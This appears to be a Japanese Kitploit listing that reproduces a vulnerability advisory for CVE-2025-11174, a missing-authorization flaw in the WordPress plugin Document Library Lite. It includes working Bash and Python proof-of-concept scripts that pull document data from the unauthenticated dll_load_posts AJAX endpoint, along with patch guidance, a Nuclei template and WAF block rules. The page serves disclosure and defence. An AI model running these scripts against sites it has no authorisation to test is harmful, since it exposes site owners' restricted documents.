Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-11174 — Document Library Lite <= 1.1.6 - 認可の欠如による機密情報の漏えい | CVE-2025-11174 | Kitploit
ツール/GitHubGitHub/snailsploit/cve-2025-11174
脆弱性分析エクスプロイトウェブアプリケーション悪用情報収集ウェブセキュリティペネトレーションテスト
GitHubsnailsploit/cve-2025-11174

CVE-2025-11174

Document Library Lite <= 1.1.6 - 認可の欠如による機密情報の漏えい | CVE-2025-11174

リポジトリを見る
24ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-11174: Document Library Lite WordPress プラグインにおける認証なし情報漏洩

CVE CVSS Score WordPress Plugin CWE-862 Wordfence

キーワード: CVE-2025-11174, Document Library Lite 脆弱性, 情報漏洩, WordPress セキュリティ, 認証なし AJAX エクスプロイト, WordPress プラグイン脆弱性, CWE-862, WordPress ドキュメントプラグインセキュリティ, 認証バイパス, WordPress CVE 2025

目次

  • 概要
  • 脆弱性の詳細
  • 技術的分析
  • 攻撃ベクトル
  • 概念実証
  • 修復ガイド
  • 検出
  • CVSS メトリクス
  • 参考文献
  • クレジット
  • セキュリティ連絡先
  • 概要

    Document Library Lite WordPress プラグイン情報漏洩脆弱性 (CVE-2025-11174) - WordPress 文書ライブラリプラグインにおいて、認証なしで機密文書データにアクセスできるセキュリティ上の欠陥です。

    Document Library Lite WordPress プラグインに重大な認証バイパス脆弱性が発見され、認証を受けていない攻撃者が適切な認証なしに機密文書情報にアクセスできることが判明しました。

    発見者: Kai Aizen & Avraham Shemesh (SnailSploit)
    公開日: 2025年11月1日
    CVSS スコア: 5.3 (Medium)
    CWE: CWE-862 - 認証の欠如
    プラグイン: Document Library Lite
    ベンダー: Barn2 Plugins
    攻撃タイプ: 認証なし情報漏洩
    必要な権限: なし (未認証攻撃)

    脆弱性の詳細

    説明

    WordPress 用 Document Library Lite プラグインは、バージョン 1.1.6 までのすべてのバージョンにおいて、不適切な認可の脆弱性を含んでいます。このプラグインは、nonce や権限チェックを行わずに文書データの JSON テーブルを返す、認証なしの AJAX アクション dll_load_posts を公開しています。

    影響

    この脆弱性により、認証されていない攻撃者は次のことが可能になります:

    • 認証なしで文書メタデータにアクセス
    • 制限されるべき文書一覧を取得
    • 認証ユーザーのみを対象とした文書情報を表示
    • Document Library に保存されている文書を列挙

    注意: CVSS スコア 5.3 (Medium) は限定的な情報漏洩を反映しています。この脆弱性により文書データへの認証なしアクセスが可能になりますが、機密性への影響は Low と評価され、完全性や可用性への影響はありません。

    影響を受けるバージョン

    • 脆弱: バージョン 1.1.6 以下
    • 修正済み: バージョン 1.1.7 以上

    CVSS v3.1 メトリクス

    root@kitploit:~
    CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    
    メトリクス値
    攻撃元区分ネットワーク (AV:N)
    攻撃条件の複雑さ低 (AC:L)
    必要な特権レベル不要 (PR:N)
    ユーザー関与レベル不要 (UI:N)
    スコープ変更なし (S:U)
    機密性への影響低 (C:L)
    完全性への影響なし (I:N)
    可用性への影響なし (A:N)

    CVSS v3.1 内訳:

    • 攻撃元区分 (AV): ネットワーク - ネットワークを介してリモートから悪用可能
    • 攻撃条件の複雑さ (AC): 低 - 悪用に特別な条件は不要
    • 必要な特権レベル (PR): 不要 - 認証や特権は不要
    • ユーザー関与レベル (UI): 不要 - ユーザーの操作なしで悪用可能
    • スコープ (S): 変更なし - 脆弱性は影響を受けるコンポーネントのみに影響
    • 機密性への影響 (C): 低 - 限定的な情報漏洩
    • 完全性への影響 (I): なし - 完全性への影響なし
    • 可用性への影響 (A): なし - 可用性への影響なし

    技術的詳細

    脆弱性の根本原因

    AJAX アクション dll_load_posts は、適切な認証や認可チェックなしで登録されています:

    root@kitploit:~
    // 脆弱なコードパターン(簡略化)
    add_action('wp_ajax_nopriv_dll_load_posts', 'dll_load_posts_callback');
    

    wp_ajax_nopriv_ プレフィックスは、このアクションが認証されていないユーザーにもアクセス可能であることを示しており、コールバック関数では次の処理が実装されていません:

    • Nonce 検証
    • 権限チェック
    • ユーザー認証の確認

    攻撃ベクトル

    root@kitploit:~
    POST /wp-admin/admin-ajax.php
    action=dll_load_posts
    

    この脆弱性は、認証なしで WordPress の admin-ajax.php エンドポイントを通じて悪用可能です。

    概念実証

    ⚠️ 教育および許可されたテスト目的のみ

    Bash PoC

    root@kitploit:~
    #!/bin/bash
    # CVE-2025-11174 PoC
    
    TARGET_URL="$1"
    
    if [ -z "$TARGET_URL" ]; then
        echo "Usage: $0 <target_url>"
        echo "Example: $0 https://example.com"
        exit 1
    fi
    
    echo "[*] CVE-2025-11174 - Document Library Lite Information Disclosure PoC"
    echo "[*] Target: $TARGET_URL"
    echo ""
    
    # Send request to vulnerable AJAX endpoint
    curl -s -X POST "$TARGET_URL/wp-admin/admin-ajax.php" \
      -H "Content-Type: application/x-www-form-urlencoded" \
      -d "action=dll_load_posts" \
      | python3 -m json.tool
    
    echo ""
    echo "[+] If you see document data above, the site is vulnerable!"
    

    Python PoC

    root@kitploit:~
    #!/usr/bin/env python3
    """
    CVE-2025-11174 - Document Library Lite Information Disclosure PoC
    For educational and authorized testing purposes only
    """
    
    import requests
    import sys
    import json
    
    def exploit(target_url):
        ajax_url = f"{target_url.rstrip('/')}/wp-admin/admin-ajax.php"
        
        print(f"[*] CVE-2025-11174 - Document Library Lite PoC")
        print(f"[*] Target: {target_url}")
        print(f"[*] AJAX Endpoint: {ajax_url}\n")
        
        data = {'action': 'dll_load_posts'}
        
        try:
            response = requests.post(ajax_url, data=data, timeout=10)
            
            if response.status_code == 200:
                print("[+] Request successful!\n")
                try:
                    json_data = response.json()
                    print("[+] Retrieved document data:")
                    print(json.dumps(json_data, indent=2))
                    print("\n[!] Site is VULNERABLE to CVE-2025-11174")
                except json.JSONDecodeError:
                    print("[-] No JSON response received")
                    print(f"Response: {response.text[:200]}")
            else:
                print(f"[-] Request failed with status code: {response.status_code}")
                
        except requests.RequestException as e:
            print(f"[-] Error: {e}")
    
    if __name__ == "__main__":
        if len(sys.argv) != 2:
            print(f"Usage: {sys.argv[0]} <target_url>")
            print(f"Example: {sys.argv[0]} https://example.com")
            sys.exit(1)
        
        target = sys.argv[1]
        exploit(target)
    

    修復

    サイト管理者向け

    直ちに必要な措置:

    1. Document Library Lite をバージョン 1.1.7 以降に直ちに更新する
    2. サイトのアクセスログで、admin-ajax.php への action=dll_load_posts を含む不審な POST リクエストを確認する
    3. すぐに更新できない場合は、プラグインを一時的に無効化することを検討する

    更新手順

    WordPress 管理画面から:

    1. WordPress 管理画面で プラグイン > インストール済みプラグイン に移動
    2. "Document Library Lite" を見つける
    3. 今すぐ更新 をクリックしてバージョン 1.1.7 以降にアップグレード
    4. 更新が成功したことを確認する

    WP-CLI を使用:

    root@kitploit:~
    wp plugin update document-library-lite
    

    プラグイン開発者向け

    すべての AJAX ハンドラに適切なセキュリティ制御を実装してください:

    root@kitploit:~
    // 適切な AJAX セキュリティの例
    add_action('wp_ajax_dll_load_posts', 'dll_load_posts_callback');
    
    function dll_load_posts_callback() {
        // Nonce を検証
        if (!wp_verify_nonce($_POST['nonce'], 'dll_nonce')) {
            wp_die('Invalid nonce');
        }
        
        // 権限をチェック
        if (!current_user_can('read')) {
            wp_send_json_error('Insufficient permissions');
            wp_die();
        }
        
        // ここに安全なコードを記述
    }
    

    検出

    WordPress プラグインチェック

    root@kitploit:~
    # 脆弱なバージョンがインストールされているか確認
    wp plugin list | grep -i "document-library-lite"
    

    セキュリティスキャナールール

    Nuclei テンプレート:

    root@kitploit:~
    id: CVE-2025-11174
    
    info:
      name: Document Library Lite - Unauthenticated Information Disclosure
      author: security-research
      severity: medium
      description: Document Library Lite plugin for WordPress is vulnerable to information disclosure
      reference:
        - https://github.com/[your-repo]/CVE-2025-11174
      tags: cve,cve2025,wordpress,wp-plugin,unauth
    
    requests:
      - method: POST
        path:
          - "{{BaseURL}}/wp-admin/admin-ajax.php"
        
        body: "action=dll_load_posts"
        
        matchers-condition: and
        matchers:
          - type: word
            words:
              - "data"
              - "recordsTotal"
            condition: and
          
          - type: status
            status:
              - 200
    

    Web アプリケーションファイアウォールルール

    ModSecurity ルール:

    root@kitploit:~
    SecRule REQUEST_URI "@contains /wp-admin/admin-ajax.php" \
        "chain,id:1000001,phase:2,t:none,t:urlDecodeUni,t:normalizePathWin,\
        log,deny,status:403,msg:'CVE-2025-11174 Exploit Attempt'"
        SecRule ARGS:action "@streq dll_load_posts" "t:none"
    

    Nginx/OpenResty ルール:

    root@kitploit:~
    if ($request_uri ~* "admin-ajax\.php") {
        if ($args ~* "action=dll_load_posts") {
            return 403;
        }
    }
    

    タイムライン

    • 2025年11月1日 - 脆弱性が公開
    • 2025年11月1日 - CVE レコード公開
    • 2025年11月 - パッチリリース (バージョン 1.1.7)

    参考文献

    • CVE-2025-11174 - CVE.org
    • GitHub Advisory Database
    • Wordfence Intelligence
    • WordPress Plugin Directory

    クレジット

    研究者:

    • Avraham Shemesh
    • Kai Aizen - SnailSploit

    開示プロセス: 協調的な開示

    免責事項

    この情報は、セキュリティ研究および防御目的でのみ提供されます。この脆弱性を悪意のある目的で悪用することは違法かつ非倫理的です。所有していないシステムをテストする前に、必ず適切な許可を取得してください。

    連絡先

    この脆弱性に関する質問や追加情報については:

    • メール: [email protected]
    • ウェブサイト: snailsploit.com
    • 組織: SnailSploit Security Research

    最終更新日: 2025年11月2日


    📚 ドキュメントと著者

    このプロジェクトの完全な書き起こし、方法論、および関連する研究は以下にあります:

    https://snailsploit.com/security-research/cves/cve-2025-11174/

    作成者: Kai Aizen — 独立した攻撃的セキュリティ研究者。

    snailsploit.com · Research · Frameworks · GitHub · LinkedIn · ResearchGate · X/Twitter

    Same attack. Different substrate.

    ツールをダウンロード